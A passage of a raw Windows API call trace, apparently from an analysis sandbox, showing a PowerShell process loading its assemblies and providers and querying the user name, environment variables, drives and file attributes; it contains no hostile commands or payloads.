lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.432] GetLastError () returned 0xcb [0153.432] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.433] GetLastError () returned 0xcb [0153.433] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.433] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x321c600*="Alias", lpRawData=0x321c4bc) returned 1 [0153.437] GetLastError () returned 0x0 [0153.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.438] GetLastError () returned 0xcb [0153.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.438] GetLastError () returned 0xcb [0153.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.439] GetLastError () returned 0xcb [0153.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.439] GetLastError () returned 0xcb [0153.439] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.439] GetLastError () returned 0xcb [0153.439] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.440] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3220540*="Environment", lpRawData=0x32203fc) returned 1 [0153.443] GetLastError () returned 0x0 [0153.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.444] GetLastError () returned 0xcb [0153.445] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0153.445] GetLastError () returned 0xcb [0153.445] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0153.445] GetLastError () returned 0xcb [0153.445] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x23e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0153.445] GetLastError () returned 0xcb [0153.445] SetErrorMode (uMode=0x1) returned 0x1 [0153.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x23e664 | out: lpFileInformation=0x23e664*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.445] GetLastError () returned 0xcb [0153.445] SetErrorMode (uMode=0x1) returned 0x1 [0153.459] GetLogicalDrives () returned 0x4 [0153.459] GetLastError () returned 0xcb [0153.490] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e108, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.490] GetLastError () returned 0xcb [0153.491] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.491] GetLastError () returned 0xcb [0153.491] SetErrorMode (uMode=0x1) returned 0x1 [0153.493] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x357f88, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x23e630, lpMaximumComponentLength=0x23e62c, lpFileSystemFlags=0x23e628, lpFileSystemNameBuffer=0x357e88, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x23e630*=0x705ba84c, lpMaximumComponentLength=0x23e62c*=0xff, lpFileSystemFlags=0x23e628*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0153.493] GetLastError () returned 0xcb [0153.493] SetErrorMode (uMode=0x1) returned 0x1 [0153.493] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.493] GetLastError () returned 0xcb [0153.494] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.494] GetLastError () returned 0xcb [0153.494] SetErrorMode (uMode=0x1) returned 0x1 [0153.494] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3221730 | out: lpFileInformation=0x3221730*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.494] GetLastError () returned 0xcb [0153.494] SetErrorMode (uMode=0x1) returned 0x1 [0153.494] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.494] GetLastError () returned 0xcb [0153.494] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e11c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.494] GetLastError () returned 0xcb [0153.494] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.494] GetLastError () returned 0xcb [0153.496] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e0d8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.496] GetLastError () returned 0xcb [0153.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.496] GetLastError () returned 0xcb [0153.497] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.497] GetLastError () returned 0xcb [0153.497] SetErrorMode (uMode=0x1) returned 0x1 [0153.497] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3222388 | out: lpFileInformation=0x3222388*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.497] GetLastError () returned 0xcb [0153.497] SetErrorMode (uMode=0x1) returned 0x1 [0153.497] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.497] GetLastError () returned 0xcb [0153.497] SetErrorMode (uMode=0x1) returned 0x1 [0153.497] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x32224d8 | out: lpFileInformation=0x32224d8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.498] GetLastError () returned 0xcb [0153.498] SetErrorMode (uMode=0x1) returned 0x1 [0153.498] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e12c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.498] GetLastError () returned 0xcb [0153.498] SetErrorMode (uMode=0x1) returned 0x1 [0153.498] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3222678 | out: lpFileInformation=0x3222678*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.498] GetLastError () returned 0xcb [0153.498] SetErrorMode (uMode=0x1) returned 0x1 [0153.498] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.507] GetLastError () returned 0xcb [0153.507] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.508] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32253ac*="FileSystem", lpRawData=0x3225268) returned 1 [0153.509] GetLastError () returned 0x0 [0153.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.510] GetLastError () returned 0xcb [0153.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.510] GetLastError () returned 0xcb [0153.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.510] GetLastError () returned 0xcb [0153.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.511] GetLastError () returned 0xcb [0153.511] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.511] GetLastError () returned 0xcb [0153.511] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.512] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3229448*="Function", lpRawData=0x3229304) returned 1 [0153.515] GetLastError () returned 0x0 [0153.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.518] GetLastError () returned 0xcb [0153.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.532] GetLastError () returned 0xcb [0153.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.532] GetLastError () returned 0xcb [0153.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.532] GetLastError () returned 0xcb [0153.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.532] GetLastError () returned 0xcb [0153.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.609] GetLastError () returned 0xcb [0153.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.609] GetLastError () returned 0xcb [0153.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.609] GetLastError () returned 0xcb [0153.610] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.611] GetLastError () returned 0xcb [0153.611] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.611] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32424b0*="Registry", lpRawData=0x324236c) returned 1 [0153.620] GetLastError () returned 0x0 [0153.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.620] GetLastError () returned 0x0 [0153.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.620] GetLastError () returned 0x0 [0153.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.621] GetLastError () returned 0x0 [0153.623] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.624] GetLastError () returned 0x0 [0153.624] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.624] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3246244*="Variable", lpRawData=0x3246100) returned 1 [0153.639] GetLastError () returned 0x0 [0153.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.641] GetLastError () returned 0xcb [0153.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.643] GetLastError () returned 0xcb [0153.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.644] GetLastError () returned 0xcb [0153.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.644] GetLastError () returned 0xcb [0153.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.645] GetLastError () returned 0xcb [0153.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.645] GetLastError () returned 0xcb [0153.772] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.772] GetLastError () returned 0x3 [0153.772] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.773] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3253fbc*="Certificate", lpRawData=0x3253e78) returned 1 [0153.779] GetLastError () returned 0x0 [0153.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.788] GetLastError () returned 0xcb [0153.795] GetLogicalDrives () returned 0x4 [0153.823] GetLastError () returned 0xcb [0153.823] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e22c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.823] GetLastError () returned 0xcb [0153.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.823] GetLastError () returned 0xcb [0153.824] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x357e88 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.824] GetLastError () returned 0xcb [0153.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.825] GetLastError () returned 0xcb [0153.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.825] GetLastError () returned 0xcb [0153.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.921] GetLastError () returned 0xcb [0153.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.957] GetLastError () returned 0xcb [0153.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.958] GetLastError () returned 0xcb [0153.958] SetErrorMode (uMode=0x1) returned 0x1 [0153.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x325aedc | out: lpFileInformation=0x325aedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.958] GetLastError () returned 0xcb [0153.958] SetErrorMode (uMode=0x1) returned 0x1 [0153.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e07c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.958] GetLastError () returned 0xcb [0153.958] SetErrorMode (uMode=0x1) returned 0x1 [0153.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x325b070 | out: lpFileInformation=0x325b070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.958] GetLastError () returned 0xcb [0153.958] SetErrorMode (uMode=0x1) returned 0x1 [0153.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.964] GetLastError () returned 0xcb [0154.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.025] GetLastError () returned 0xcb [0154.026] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.026] GetLastError () returned 0xcb [0154.026] SetErrorMode (uMode=0x1) returned 0x1 [0154.026] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0154.026] GetLastError () returned 0xcb [0154.026] SetErrorMode (uMode=0x1) returned 0x1 [0154.026] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.026] GetLastError () returned 0xcb [0154.026] SetErrorMode (uMode=0x1) returned 0x1 [0154.026] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0154.026] GetLastError () returned 0xcb [0154.026] SetErrorMode (uMode=0x1) returned 0x1 [0154.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x23e154, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.027] GetLastError () returned 0xcb [0154.027] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e0f0, lpFilePart=0x0 | out: 